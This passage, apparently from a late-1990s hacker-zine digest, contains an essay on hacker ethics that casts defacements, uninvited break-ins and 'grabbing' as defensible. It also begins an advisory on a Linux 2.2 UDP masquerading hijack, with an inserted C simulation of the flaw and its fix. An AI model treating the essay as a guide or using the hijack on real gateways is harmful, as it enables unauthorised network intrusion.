       hacker philosophy, with touching results for most true hackers (even if 
       it may be difficult to think of a hacker as a person that has a heart as 
       well as a brain). 

            [...] 

            Mine is a world that begins with school... I'm smarter than most of 
            the other kids, this crap they teach us bores me... Damn 
            underachiever. 

            [...] 

            we've been spoon-fed baby food at school when we hungered for 
            steak... the bits of meat that you did let slip through were 
            pre-chewed and tasteless. We've been dominated by sadists, or 
            ignored by the apathetic. The few that had something to teach found 
            us willing pupils, but those few are like drops of water in the 
            desert. 

            [...] 

            We explore... and you call us criminals. We seek after knowledge... 
            and you call us criminals. We exist without skin color, without 
            nationality, without religious bias... and you call us criminals. 
            You build atomic bombs, you wage wars, you murder, cheat, and lie to 
            us and try to make us believe it's for our own good, yet we're the 
            criminals. 

            Yes, I am a criminal. My crime is that of curiosity. My crime is 
            that of judging people by what they say and think, not what they 
            look like. My crime is that of outsmarting you, something that you 
            will never forgive me for. 

            [...] 

       In these words, you will see the frustration of living in a defective 
       world, that deprives the individuals that wish to rise above the 
       mediocre, of the very information and resources they desire, to know what 
       is kept hidden, and it condemns them hypocritically as criminals. 

       But the desperate search for knowledge is only one of the characteristics 
       of the hacker. Another sure one is the pursuit of extreme perfection. An 
       interesting article that narrates the history of the first hackers, and 
       of how they developed "Spacewar!" (the first videogame in history, born 
       as a demo for the TX-0, meant as a "killer application" for this 
       computer, with all its features exploitable), is "The origin of 
       Spacewar", written by J. M. Graetz and published in the August, 1981 
       issue of Creative Computing magazine.

            One of the forces driving the dedicated hacker is the quest for 
            elegance. It is not sufficient to write programs that work. They 
            must also be "elegant," either in code or in function -- both, if 
            possible. An elegant program does its job as fast as possible, or is 
            as compact as possible, or is as clever as possible in taking 
            advantage of the particular features of the machine in which it 
            runs, and (finally) produces its results in an aesthetically 
            pleasing form without compromising either the results or operation 
            of other programs associated with it. 

       But the elegance and the perfection of hackers is not always 
       comprehensible to the average individual. A hacker can often be in 
       ecstasy reading some code written by another hacker, admiring his ability 
       and "tasting" his style, as if he was reading poetry. 

       For example, normally to exchange the content of two variables (a and b, 
       in this case), the statement most commonly used is this, which uses a 
       third temporary variable: 

            dummy = a : a = b : b = dummy 

       The following method, instead, doesn't need the third variable, because 
       it exploits a mathematical peculiarity of the boolean operator XOR: 

            a = a XOR b : b = a XOR b : a = a XOR b 

       Even if this system is at least three times slower than the first one, 
       because it requires the execution of three mathematical operations 
       (however, it saves the memory that the third variable would normally 
       occupy), a hacker will surely admire the ingeniousness and the elegance 
       of this method; to him it takes on the flavour of a Japanese haiku. 
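       The two swaps above written out in C, as an added example (not part of the 
       essay), together with the one case the XOR trick gets wrong: swapping a 
       variable with itself zeroes it, which the temporary-variable version never 
       does, so a guard on aliasing is needed before the trick can be used safely.

```c
#include <stdio.h>

/* The usual swap, through a temporary: dummy = a : a = b : b = dummy */
void swap_tmp(int *a, int *b)
{
    int dummy = *a;
    *a = *b;
    *b = dummy;
}

/* The XOR swap as written in the text: a = a XOR b : b = a XOR b : a = a XOR b.
 * Left without a guard so that its failure mode can be demonstrated below. */
void swap_xor_unguarded(int *a, int *b)
{
    *a ^= *b;
    *b ^= *a;
    *a ^= *b;
}

/* When a and b are the same object the first XOR zeroes it and the next two
 * keep it at zero, so the value is destroyed rather than swapped with itself.
 * Checking the addresses first restores the behaviour of swap_tmp(). */
void swap_xor(int *a, int *b)
{
    if (a == b) return;
    swap_xor_unguarded(a, b);
}

/* Return the value left in x after swapping it with itself, for comparison. */
int self_swap_unguarded(int x) { swap_xor_unguarded(&x, &x); return x; }
int self_swap_guarded(int x)   { swap_xor(&x, &x); return x; }

int main(void)
{
    int a = 3, b = 5;
    swap_xor(&a, &b);
    printf("after swap_xor: a=%d b=%d\n", a, b);
    printf("7 swapped with itself: unguarded=%d guarded=%d\n",
           self_swap_unguarded(7), self_swap_guarded(7));
    return 0;
}
```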

       Talking about the perfectionism of the hackers, in "Hackers: Heroes of 
       the Computer Revolution" written by Steven Levy in 1984, in the chapter 2 
       ("The Hacker Ethic"), we read: 

            Hackers believe that essential lessons can be learned about the 
            systems--about the world--from taking things apart, seeing how they 
            work, and using this knowledge to create new and even more 
            interesting things. They resent any person, physical barrier, or law 
            that tries to keep them from doing this. 

            This is especially true when a hacker wants to fix something that 
            (from his point of view) is broken or needs improvement. Imperfect 
            systems infuriate hackers, whose primal instinct is to debug them. 
            This is one reason why hackers generally hate driving cars--the 
            system of randomly programmed red lights and oddly laid out one-way 
            streets causes delays which are so goddamned UNNECESSARY that the 
            impulse is to rearrange signs, open up traffic-light control boxes . 
            . .redesign the entire system. 

            In a perfect hacker world, anyone pissed off enough to open up a 
            control box near a traffic light and take it apart to make it work 
            better should be perfectly welcome to make the attempt. 

       It is in the name of this very principle that the Linux operating 
       system and the GNU C compiler have been developed: their code is open 
       and available for anyone to change and modify. Lately, some important 
       commercial software producers have also started moving in this 
       direction, Netscape among them: Netscape Communicator 5 will in fact be 
       the first program, originally born as a "closed" commercial product, to 
       be developed with this kind of philosophy. 

       A hacker is never satisfied with the default settings of a program or 
       with a standard installation: he always has to open the configuration 
       menu and set the options to get the maximum performance, and to make 
       the product work as closely as possible to his "way". A hacker must be 
       able to use, modify and check every possible feature of a program. 

       But after all, what motivates hackers? Why do they create programs that 
       exploit advanced techniques and then distribute them for free? And why 
       do they freely distribute knowledge that was incredibly difficult to 
       obtain? A good answer can be found on the site of KIN (Klever Internet 
       Nothings, http://www.klever.net); they are not exactly a hacker crew, 
       but a group of people who write programs and release them freely on 
       the Internet: 

            What makes people write software and distribute it for free? Vanity, 
            you said? Well, maybe.. But after all, what is this business all 
            about? Is it all about money? Ask anyone - it's not. Most people I 
            know in the industry will tell you that. Their idea is "just leave 
            me alone and let me do what I love to do". 

       In short, it's not about money. It's about feeling free to do what you 
       want and, just possibly, finding someone who appreciates your work. 


       THE HACKER ETHIC 

       The true hacker does not moralize, and he would never censor 
       information or ideas of any kind. An initiative of the Italian priest 
       Don Fortunato di Noto (fortunad@sistemia.it), who in January 1998 
       formed the "Committee of Resistance against the Pedophiles" and asked 
       the hacker community for help in unmasking, capturing and closing down 
       the sites of pedophiles on the Internet, failed miserably, as it was 
       only supported by self-proclaimed hackers without any skill. 

       Besides, hackers are tolerant by nature and rarely get angry, though 
       they are irritated by people and tasks they perceive to be wasting 
       their time. There are, however, some things that hackers cannot 
       tolerate. One of these is lies told to them or about them: you may say 
       that hackers are imbeciles (it's an opinion, after all), but you cannot 
       say that they steal chickens. Even so, it would be unusual for hackers 
       to hack a site in order to remove the lies propagated about them; it 
       would be more typical for them to create another site refuting those 
       lies. 

       Hacking can, however, be used as a form of protest: breaking into and 
       modifying the websites of very well known companies, or of government 
       or military entities, can be a way to make public certain injustices 
       (especially attacks on the freedom of information or expression) or 
       violations of human rights. The defacements of the websites of the CIA 
       (which became the "Central Stupidity Agency") and of the Department of 
       Justice are famous examples of hacks carried out with this intention 
       in mind. In the article "Hacking for Human Rights?" by Arik Hesseldahl 
       (ahess@reporters.net), published in the online magazine Wired 
       (http://www.wired.com) and dated 14 Jul 98, 9:15am, the hacker Blondie 
       Wong (a dissident Chinese astrophysicist living in Canada who, 
       according to the article, temporarily disabled a Chinese satellite in 
       1997), a member of the famous hacker crew Cult of the Dead Cow (which 
       released the Back Orifice trojan in August 1998), threatened to attack 
       the computer networks of foreign companies doing business with China, 
       causing them serious damage and huge financial losses. In an interview 
       conducted by Oxblood Ruffin, a former United Nations consultant, and 
       published in Wired, Blondie Wong says: "Human rights is an 
       international issue, so I don't have a problem with businesses that 
       profit from our suffering paying part of the bill". 

       Alongside the complete lack of moral judgement (and, above all, of 
       moralism) of hackers lies a deep ethical sense, something almost 
       "religious" in most hackers. On this point we can go back to the 
       Jargon File: 

            :hacker ethic, the: n. 1. The belief that information-sharing is a 
            powerful positive good, and that it is an ethical duty of hackers to 
            share their expertise by writing free software and facilitating 
            access to information and to computing resources wherever possible. 
            2. The belief that system-cracking for fun and exploration is 
            ethically OK as long as the cracker commits no theft, vandalism, or 
            breach of confidentiality. 

            Both of these normative ethical principles are widely (but by no 
            means universally) accepted among hackers. Most hackers subscribe to 
            the hacker ethic in sense 1, and many act on it by writing and 
            giving away free software. A few go further and assert that *all* 
            information should be free and *any* proprietary control of it is 
            bad [...] 

            Sense 2 is more controversial: some people consider the act of 
            cracking itself to be unethical [...] But this principle at least 
            moderates the behavior of people who see themselves as `benign' 
            crackers (see also {samurai}). On this view, it is one of the 
            highest forms of hackerly courtesy to (a) break into a system, and 
            then (b) explain to the sysop, preferably by email from a 
            {superuser} account, exactly how it was done and how the hole can be 
            plugged --- acting as an unpaid (and unsolicited) {tiger team} [The 
            "tiger team" derives from the U.S. military jargon. These people are 
            paid professionals who do hacker-type tricks, e.g., leave cardboard 
            signs saying "bomb" in critical defense installations, hand-lettered 
            notes saying "Your codebooks have been stolen" (they usually haven't 
            been) inside safes, etc. Serious successes of tiger teams sometimes 
            lead to early retirement for base commanders and security officers]. 

            [...] 

       Breaking into a system is not seen by the hacker as a criminal action 
       but as a challenge. The idea is not to damage the "victim", but to find 
       a way through its defenses. It is the intellectual challenge, the 
       curiosity, the will to experiment and to explore that moves the hacker, 
       not the will to damage someone or something, and not even the prospect 
       of personal profit. 

       In another text by The Mentor, "A Novice's Guide to Hacking - 1989 
       edition", dated December 1988, the author opens the essay with an 
       appeal to the ethics of the category, followed by a list of 
       "suggestions for guidelines to follow to ensure that not only you stay 
       out of trouble, but you pursue your craft without damaging the 
       computers you hack into or the companies who own them": 

            As long as there have been computers, there have been hackers. In 
            the 50's at the Massachusetts Institute of Technology (MIT), students 
            devoted much time and energy to ingenious exploration of the 
            computers. Rules and the law were disregarded in their pursuit for 
            the 'hack'. Just as they were enthralled with their pursuit of 
            information, so are we. The thrill of the hack is not in breaking 
            the law, it's in the pursuit and capture of knowledge. 

       In a file titled "The Hotmail Hack", written by Digital Assassin of the 
       "United Underground" (or "U2" for short), which describes a weakness in 
       the HotMail system through which it is possible to get into another 
       person's mailbox, the author at a certain point interrupts the 
       explanation with these words: 

            ....but before I tell you how to use that line, I'm going to side 
            track for a little theory behind this hack. Because there's NO point 
            in a hack, if you don't know how it works. That is the whole idea of 
            hacking, to find out how systems work. 

       These are clear examples of the real intent of a hacker when he breaks 
       into a system. It is very close to the idea of a child who opens a toy 
       to see how it works. The difference is that the hacker tries not to 
       destroy the toy (aside from the fact that the toy is not his own...). 

       Let's now look at the specific definition of "cracker" according to 
       the Jargon File: 

            :cracker: n. One who breaks security on a system. Coined ca. 1985 by 
            hackers in defense against journalistic misuse of {hacker} (q.v., 
            sense 8). An earlier attempt to establish `worm' in this sense 
            around 1981--82 on USENET was largely a failure. 

            Both these neologisms reflected a strong revulsion against the theft 
            and vandalism perpetrated by cracking rings. While it is expected 
            that any real hacker will have done some playful cracking and knows 
            many of the basic techniques, anyone past {larval stage} is expected 
            to have outgrown the desire to do so. 

            Thus, there is far less overlap between hackerdom and crackerdom 
            than the {mundane} [the term "mundane" is taken from the Sci-Fi 
            fandom and identifies everything outside the world of the computer 
            science, or the hacking] reader misled by sensationalistic 
            journalism might expect. Crackers tend to gather in small, 
            tight-knit, very secretive groups that have little overlap with the 
            huge, open poly-culture this lexicon describes; though crackers 
            often like to describe *themselves* as hackers, most true hackers 
            consider them a separate and lower form of life. 

            Ethical considerations aside, hackers figure that anyone who can't 
            imagine a more interesting way to play with their computers than 
            breaking into someone else's has to be pretty {losing} [on the other 
            hand, they have the same consideration for the people who use the 
            computer in an absolute conventional way, such as only to write 
            documents or to play] [...] 

       Furthermore, about "cracking" itself, the Jargon File says: 

            :cracking: n. The act of breaking into a computer system; what a 
            {cracker} does. Contrary to widespread myth, this does not usually 
            involve some mysterious leap of hackerly brilliance, but rather 
            persistence and the dogged repetition of a handful of fairly 
            well-known tricks that exploit common weaknesses in the security of 
            target systems. Accordingly, most crackers are only mediocre 
            hackers. 

       However, this is a superficial and reductive view. In fact, as one can 
       easily imagine, there are people who are just as experienced with 
       computers and just as thirsty for knowledge, but who have no respect 
       for the hacker ethic and don't hesitate to perform actions meant to 
       damage computer systems or other people. They are the so-called 
       dark-side hackers. The term derives from George Lucas' "Star Wars": a 
       dark-side hacker, just like Darth Vader, is "seduced by the dark side 
       of the Force". It has nothing to do with the common idea of "good" and 
       "bad"; it is closer to the idea of "lawful" and "chaotic" in Dungeons & 
       Dragons. In substance, dark-side hackers are accorded the same dignity 
       and recognized as having the ability of a hacker, but their orientation 
       makes them a dangerous element for the community. A more common 
       definition, reserved for those who damage other people's computer 
       systems without drawing any benefit from it (therefore out of pure 
       stupidity or malice), is that of malicious hackers. 

       More recent versions of the Jargon File (from which some of the most 
       obsolete terms have been removed), such as version 4.0.0 of 24 JUL 
       1996, make clear not only the distinction between hacker and cracker, 
       but also that between the whole hacking scene and other parallel 
       realities, like piracy and the "warez d00dz", who collect an impressive 
       amount of software (games and applications, or rather "gamez" and 
       "appz") that they are never likely to use, and whose greatest pride is 
       to get hold of software, break its protections, and distribute it on 
       their website before their rival crew, where possible within the same 
       day it was released ("0-day warez"). 

       One could think that the Jargon File speaks only in theory, and that it 
       describes the hacker ethic in a fantastic and utopian way. This is not 
       so: hackers really are attached to their principles. The following is a 
       practical example concerning one of the most famous hacker crews, the 
       LOD (Legion of Doom, which takes its name from the group of villains in 
       the "Super Friends" Superman cartoon series), of which The Mentor (the 
       already cited author of "The Conscience of a Hacker") was also a member 
       during the years 1988-89. 

       In "The History of LOD/H", Revision #3 May 1990, written by Lex Luthor 
       (founder of the crew, from the name of the baddie in the movie Superman 
       I), and published on their e-zine "The LOD/H Technical Journal", Issue 
       #4, released on May 20, 1990 (File 06 of 10), we can read: 

            Of all 38 members, only one was forcefully ejected. It was found out 
            that Terminal Man [member of the LOD/H in 1985] destroyed data that 
            was not related to covering his tracks. This has always been 
            unacceptable to us, regardless of what the media and law enforcement 
            tries to get you to think. 

       Yet not everyone agrees on the same principles, and there are some 
       "grey areas": for example, taking possession of objects that give 
       access to information, or pursuing a personal purpose, can be 
       considered "ethical" by some. A specific example is "grabbing": the 
       theft of things like keys, magnetic cards, manuals or technical 
       schematics. This is a debatable activity, though, since a hacker 
       prefers to copy rather than to take, not only to avoid damaging the 
       "victim", but also to avoid leaving traces of his intrusion. A more 
       acceptable, and usually legal, variant is "trashing", which consists 
       in looking through the garbage of the target in search of objects 
       and/or useful information. 

       But breaking into computer systems is only one small activity among the 
       many things hackers are involved in, and the aversion to acts of 
       virtual vandalism is only a small part of the hacker ethic. The hacker 
       ethic is something greater, almost mystical, and draws its origins from 
       the first hackers, those who programmed the TX-0, using the first 
       computers available in the big American universities like MIT or 
       Stanford. From the already cited "Hackers: Heroes of the Computer 
       Revolution" by Steven Levy: 

            Something new was coalescing around the TX-0: a new way of life, 
            with a philosophy, an ethic, and a dream. 

            There was no one moment when it started to dawn on the TX-0 hackers 
            that by devoting their technical abilities to computing with a 
            devotion rarely seen outside of monasteries they were the vanguard 
            of a daring symbiosis between man and machine. With a fervor like 
            that of young hot-rodders fixated on souping up engines, they came 
            to take their almost unique surroundings for granted. Even as the 
            elements of a culture were forming, as legends began to accrue, as 
            their mastery of programming started to surpass any previous 
            recorded levels of skill, the dozen or so hackers were reluctant to 
            acknowledge that their tiny society, on intimate terms with the 
            TX-0, had been slowly and implicitly piecing together a body of 
            concepts, beliefs, and mores. 

            The precepts of this revolutionary Hacker Ethic were not so much 
            debated and discussed as silently agreed upon. No manifestos were 
            issued ["The Mentor"'s one, very polemic, was written only about 
            twenty years later]. No missionaries tried to gather converts. The 
            computer did the converting [...] 

       In short, Steven Levy sums up the "hacker ethic" this way: 

            Access to computers -- and anything which might teach you something 
            about the way the world works -- should be unlimited and total. 
            Always yield to the Hands-On imperative. 

            All information should be free. 

            Mistrust Authority. Promote Decentralization. 

            Hackers should be judged by their hacking, not bogus criteria such 
            as degrees, age, race, or position. 

            You can create art and beauty on a computer. 

            Computers can change your life for the better. 

            LIKE ALADDIN'S LAMP, YOU COULD GET IT [THE COMPUTER] TO DO YOUR 
            BIDDING. 


       THE LAMER 

       From "The Hacker Crackdown - Law and Disorder on the Electronic Frontier" 
       by Bruce Sterling, Bantam Books, 1992. (ISBN 0-553-08058-X, paperback: 
       ISBN 0-553-56370-X, released as free electronic text for non-commercial 
       purposes) 

            There are hackers today who fiercely and publicly resist any 
            besmirching of the noble title of hacker. Naturally and 
            understandably, they deeply resent the attack on their values 
            implicit in using the word "hacker" as a synonym for 
            computer-criminal. 

            [...] 

            The term "hacking" is used routinely today by almost all law 
            enforcement officials with any professional interest in computer 
            fraud and abuse. American police describe almost any crime committed 
            with, by, through, or against a computer as hacking. 

       If the distinction between hacker, cracker and dark-side hacker may 
       seem a very fine one to those who live outside the computer scene, 
       nobody, least of all a journalist, should confuse a hacker with the 
       poor idiot who got locked up for using, with no thought for the 
       consequences, programs he found somewhere (even if using the term 
       "hacker" does sell more newspapers... The difference between hackers 
       and journalists is that the former have ethics, while the latter lack 
       even a sense of modesty... though this is often simply ignorance). 

       Let's take as an example the following article, published in the Italian 
       newspaper "L'Unione Sarda" (http://www.unionesarda.it/) by Luigi 
       Almiento (almiento@unionesarda.it): 

            POLICE. 

            The arrested hacker is a surveyor, aged 25 

            Files were stolen from the computers of Internet "navigators", with 
            the aid of a virus spread on the Internet 

            Many people from different national service providers recently 
            learned, to their own detriment, that it is better not to stay and 
            chat with strangers on the chat-lines of the Internet. This occurred 
            when a hacker aged 25 obtained the user names and passwords of their 
            dial-up accounts while they were on-line. 

            [...] 

            "Harris", explains lieutenant Saverio Spoto, commander of the Police 
            Station [actually they are "Carabinieri", not the normal Police, 
            because in Italy there are two different police forces, don't ask 
            why], «contacted his victims through Icq, a "talking place" offered 
            by many Internet providers». During these "written talks", using an 
            access key he acquired that gives false information, G. F. sent the 
            Netbus virus to the computers of his victims. This allowed him to 
            "navigate" the hard drives of the computers of these people while 
            they were connected to the Internet. Harris also had a site which 
            offered pornographic pictures, pirate programs and files of every 
            kind, and whenever someone connected to his address they were 
            immediately infected by the computer virus. 
       
       [...] 

       In a few words, lieutenant Spoto manages to show his complete 
       ignorance of the subject: he gives an abominable definition of ICQ, 
       calls Netbus a virus rather than a trojan (which means he has no idea 
       of how it works), and, still not satisfied with this, attributes to it 
       a contagiousness similar to that of the Ebola virus: being infected 
       simply by connecting to an Internet address sounds like something 
       supernatural. Then he shamelessly concludes with the invitation "If 
       anyone has had contact with Harris, and thinks that their files may 
       have been forced, they can come to us at the Police Station". If 
       everyone at the Police Station is as experienced as he is, it would be 
       preferable to keep Harris' "virus" rather than let them put their hands 
       anywhere near your computer. 

       Besides, these self-proclaimed hackers are almost never busted because 
       of a police operation (unless they caused a lot of trouble), but because 
       they have the stupid habit of boasting about their deeds in chatrooms or 
       even in real life, often in front of total strangers who turn out to be 
       police officers or people close to the law enforcement environment 
       (such as the child or the girlfriend of a police officer). In fact, the 
       concluding part of the article about "Harris" says: "The investigators 
       did not explain how, but only that they had succeeded in identifying 
       the surveyor": obviously the officers would like people to think that 
       they identified the culprit by means of some complicated technique, 
       tracing the packets or something along those lines, rather than 
       admitting that they only had to make a few enquiries on IRC channels. 

       The hacker is the one who develops the exploit and, eventually, writes 
       a program based on it. People who blindly use these programs because 
       they found them on the Internet, or even worse, because a friend passed 
       them on, are merely lamers: they have only a vague idea of how to use 
       the tool in their hands and know nothing about computer systems, 
       programming, or how to cover their tracks. Often these self-proclaimed 
       hackers, through their own incompetence, infect themselves with the 
       very virus or trojan they just downloaded. Putting these programs in 
       the hands of the average person is like giving a loaded gun to a five 
       year-old. 

       The fact is that up to the early '80s, computers were only intended for 
       hackers, specialized personnel or students. Only later did they appear 
       on office desks and in houses. The first home computers replaced the 
       primitive videogame consoles like the Atari 2600, the Intellivision 
       and the Colecovision (the revolution was led by the Commodore 64 and 
       the Sinclair ZX Spectrum), but throughout the '80s there was still a 
       "computer culture" across the whole world: magazines were published 
       that taught programming (mainly BASIC, as well as machine code) and 
       very advanced techniques worthy of the best hackers. Then, during the 
       '90s, Apple's and Microsoft's dream started to come true: "a computer 
       on every desk and in every home". The computer became a common 
       appliance available to almost everybody, the general level of the 
       magazines started to drop, and almost all of them were confined to 
       publishing articles about the latest hardware and software, or advice 
       on how to use commercial applications. This change in the computer 
       world, which made computers the domain not only of hackers but of 
       everyone, has certainly had some positive effects, but it proved to be 
       a double-edged sword, especially with the advent of the Internet. These 
       days anyone can have powerful tools that inflict damage on other people, 
       real "digital weapons", without having a clue about how they work or 
       how they should be "handled". The average guy can get locked up just 
       for perpetrating what he thought was a "cool" joke, even if it was in 
       bad taste. 

       All those lamers-wannabe-hackers would do better to satisfy their needs 
       with APEX v1.00 r10/8/91, a nice program written by Ed T. Toton III 
       (the original idea, however, is older) that simulates connecting to 
       various US government and military computers (like those of NORAD, or 
       of NASA); among other things it is also possible to pretend that you 
       are the President of the United States of America and enter the system 
       that controls the nuclear weapons. With a bit of skill and practice it 
       is possible to convince some friends that you are really trying to 
       break into US computer systems, and pass the time having good clean 
       fun, without hurting anybody, risking a jail sentence and/or offending 
       the hackers by pretending to be what you are not. 

       But besides this, outside of the "criminal" context, something that 
       bothers hackers is the ever-increasing mass of self-proclaimed computer 
       "experts", who actually don't know much more than how to turn on a 
       computer and launch a program, and who fill their mouths with loads of 
       technical words about which they know nothing. On this point it is very 
       interesting to read this text from the already quoted home page of 
       KIN: 

            I remember [...] When writing software was closer to art and magic 
            than to business and/or just coding. I miss that now. What happened 
            after that? Well, tons of fast graduates appeared who could only do 
            Basic or Clipper/DBase programming, who pretended to be the best. 
            They could wear suits and had money and relatives... I called them 
            nephews. How many times were you in the situation when you gave the 
            best offer, and you simply feel you HAD to write this software - but 
            in the end your client says something like: "I'm really sorry, but I 
            just got a call from my wife and her nephew works for this company 
            in Nebraska who are certified Basic engineers so we'll have to give 
            the contract to them?" The nephews produced terrible software which 
            led to terrible disappointments in the industry ('I've invested so 
            much money in computers and it's not really working for me'). 

            [...] The Net gives you a chance to be first creative and then think 
            about business. Let's use it now - before nephews will get their 
            certified degrees.... 

       Sadly, a crowd of nephews are already at work, with or without 
       certified degrees, armed with programs like FrontPage or Publisher, 
       creating websites and filling their big mouths with words like FTP and 
       client-server application, even if they don't know what they mean or 
       what they are talking about. Luckily, the Net is large and, at least 
       for the moment, it generates its own rules by itself. There is room for 
       everyone. 


                                                                                                                                                                                                    
       @HWA             
       
264.0 Linux 2.2.x masq tunnel/hijack scenario
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      COMMAND
  
      kernel (IP Masquerading)
  
      SYSTEMS AFFECTED
  
      Linux 2.2.x
  
      PROBLEM
  
      H D Moore found the following. Due to lax checking in the masquerading
      kernel code, an attacker is able to rewrite a Linux masq gateway's UDP
      masquerading entries so that the remote host and port are whatever
      they choose. This creates a tunnel between whatever host and port they
      want and a UDP port on an inside machine. The attacker is unable to
      tell which inside ports and addresses are being used, but they can
      determine the number of currently masqueraded connections and the
      number of different hosts using those connections behind the firewall.
      Any network where UDP traffic is masqueraded to the outside is
      vulnerable to this, including DNS, TFTP, NetBIOS, and a multitude of
      other applications which rely on UDP transport. Since UDP is a
      connectionless protocol, the only way to determine that a masqueraded
      connection is no longer in use is to time it out for lack of activity,
      or to receive an ICMP message indicating that the port is closed. The
      result is that there is a 5 minute time-out by default for all
      masqueraded UDP sessions, allowing an attacker enough time to find and
      exploit the connection with some of the methods outlined in the
      Examples section below.
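      As an added example, not part of H D Moore's advisory or of the kernel
      source, the following C model simulates a UDP masquerading table and the
      lax inbound check described above: an incoming datagram is matched on
      the gateway's masq port alone, and the entry's remote host and port are
      then overwritten with the packet's source, so any outsider who hits the
      port becomes the other end of the tunnel. The same model run with a
      strict check (the packet must come from the recorded remote host:port)
      shows the hijack failing while genuine replies still get through, and
      the 5-minute idle timeout is modelled too. The structure, the function
      names, the port allocation and the sample addresses (10.0.0.5,
      192.0.2.53, 198.51.100.7) are assumptions made for the example, not the
      kernel's.

```c
#include <stdint.h>
#include <string.h>

/* Model of a UDP masquerading table, added for this advisory. It is NOT the
 * Linux 2.2 kernel code: structure, lookup logic and sample addresses are
 * assumptions chosen to show the lax inbound check the text describes. */

#define MASQ_PORT_LOW   61000   /* default masq port range, from the text */
#define MASQ_PORT_HIGH  65096
#define UDP_TIMEOUT     300     /* 5-minute UDP idle timeout, from the text */
#define MAX_ENTRIES     8

struct masq_entry {
    int      in_use;
    uint32_t in_addr;   /* inside host (Host A) and its port (1035)     */
    uint16_t in_port;
    uint16_t m_port;    /* port the gateway allocated (61000..65096)    */
    uint32_t out_addr;  /* remote host (Host Z) and its port (53)       */
    uint16_t out_port;
    uint32_t expires;   /* time (seconds) after which the entry is dead */
};

struct udp_pkt { uint32_t saddr, daddr; uint16_t sport, dport; };

static struct masq_entry table[MAX_ENTRIES];
static uint16_t next_m_port = MASQ_PORT_LOW;

void masq_reset(void)
{
    memset(table, 0, sizeof table);
    next_m_port = MASQ_PORT_LOW;
}

/* Outbound datagram from the inside: allocate an entry and return the masq
 * port the gateway will use as its source port; 0 if nothing is free. */
uint16_t masq_out(const struct udp_pkt *p, uint32_t now)
{
    if (next_m_port > MASQ_PORT_HIGH)
        return 0;
    for (int i = 0; i < MAX_ENTRIES; i++) {
        if (table[i].in_use)
            continue;
        table[i] = (struct masq_entry){ .in_use = 1,
            .in_addr = p->saddr, .in_port = p->sport, .m_port = next_m_port++,
            .out_addr = p->daddr, .out_port = p->dport,
            .expires = now + UDP_TIMEOUT };
        return table[i].m_port;
    }
    return 0;
}

/* Inbound datagram addressed to one of the gateway's masq ports. Returns the
 * index of the entry it was mapped to, or -1 if dropped. With strict == 0
 * only the masq port is checked and the remote side of the entry is then
 * overwritten with whatever source the packet carries (the hijack). With
 * strict == 1 the packet must also come from the recorded remote host:port.
 * In both modes a match refreshes the idle timer, which is what lets an
 * attacker keep a hijacked mapping alive past the 5-minute timeout. */
int masq_in(struct udp_pkt *p, uint32_t now, int strict)
{
    for (int i = 0; i < MAX_ENTRIES; i++) {
        struct masq_entry *e = &table[i];
        if (!e->in_use || e->m_port != p->dport)
            continue;
        if (now >= e->expires) {      /* idle too long: the mapping is gone */
            e->in_use = 0;
            return -1;
        }
        if (strict && (e->out_addr != p->saddr || e->out_port != p->sport))
            return -1;
        e->out_addr = p->saddr;       /* no-op when strict, hijack when lax */
        e->out_port = p->sport;
        e->expires  = now + UDP_TIMEOUT;
        p->daddr = e->in_addr;        /* de-masquerade towards the inside host */
        p->dport = e->in_port;
        return i;
    }
    return -1;
}

uint32_t masq_remote_addr(int i) { return table[i].out_addr; }
uint16_t masq_remote_port(int i) { return table[i].out_port; }

/* Constructed sample addresses: A = 10.0.0.5 (inside), Z = 192.0.2.53 (the
 * DNS server), X = 198.51.100.7 (the attacker). */
#define HOST_A 0x0A000005u
#define HOST_Z 0xC0000235u
#define HOST_X 0xC6336407u

/* The advisory's scenario: A:1035 -> Z:53 is masqueraded, then X:9999 sends
 * a datagram to the gateway's masq port. Returns 1 if X now owns the entry. */
int hijack_scenario(int strict)
{
    masq_reset();
    struct udp_pkt q = { HOST_A, HOST_Z, 1035, 53 };
    uint16_t mport = masq_out(&q, 0);
    struct udp_pkt atk = { HOST_X, 0, 9999, mport };
    int idx = masq_in(&atk, 10, strict);
    return idx >= 0 && masq_remote_addr(idx) == HOST_X
                    && masq_remote_port(idx) == 9999;
}

/* A genuine reply from Z:53 arriving at time `now`. Returns 1 if it was
 * delivered to A:1035, 0 if dropped (e.g. after the idle timeout). */
int reply_scenario(uint32_t now, int strict)
{
    masq_reset();
    struct udp_pkt q = { HOST_A, HOST_Z, 1035, 53 };
    uint16_t mport = masq_out(&q, 0);
    struct udp_pkt reply = { HOST_Z, 0, 53, mport };
    return masq_in(&reply, now, strict) >= 0
        && reply.daddr == HOST_A && reply.dport == 1035;
}
```

      Compiled with any C99 compiler, hijack_scenario(0) returns 1 (the lax
      table now points at the attacker) and hijack_scenario(1) returns 0, while
      reply_scenario(10, 1) still delivers the real DNS answer. Note that the
      strict check as modelled here is what a stateful NAT should do at minimum;
      it does not help against an attacker who can spoof the recorded remote
      host:port, and the attacker still has to guess which masq port in the
      61000-65096 range is live, which is the probing the advisory refers to.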
  
      For those familiar with the Linux masquerading system, please
      jump to the next paragraph.  IP masquerading is an implementation
      of NAT (Network Address Translation) for the Linux OS.  It allows
      you to connect an internal network using private addresses to an
      external network (internet) in a fairly secure manner.  All
      packets coming from the internal network and destined for the
      external network are rewritten so the source of those packets is
      the masquerading gateway's external address and the source port
      is the gateway's source port.  This only requires one external IP
      address to enable internet access for hundreds/thousands of
      internal machines and is therefore a popular method for many
      businesses and home users with broadband connections.  The TCP
      and UDP protocols require both source and destination ports as
      well as source and destination addresses to work.  The source
      port for outgoing UDP/TCP connections is usually picked from the
      first available port between 1024 and 65535 on the originating
      host, so how does the masq gateway relay these connections AND
      still use these protocols for its own networking?  The kernel
      sets aside the ports 61000 to 65096 by default for handling the
      masqueraded connection entries, allowing for a theoretical
      maximum of 4096 of both UDP and TCP connections at a time.  These
      values can be changed in the code or through the /proc file
      system.  Now when a connection request from internal host A comes
      in from local port 1035 and its destination is the external DNS
      server Host Z on port 53, the masquerading machine adds a new
      entry to the masquerading table that looks like this:
  
          Host A:1035 (61001) -> Host Z:53
  
      The port in parentheses is the local port the gateway uses to
      send the forwarded UDP datagrams from and the port it uses to
      receive responses back from Host Z.  The next paragraph describes
      how the vulnerability found allows an attacker to modify the
      right side of the above connection to allow traffic to come from
      their host back into the internal network to the local port on
      the inside host.
  
      The UDP masquerading code only checks the DESTINATION PORT to
      determine if a packet coming from the external network is to be
      forwarded inside.  It then sets the remote HOST and PORT to the
      source address and source port of the incoming packet.  This is
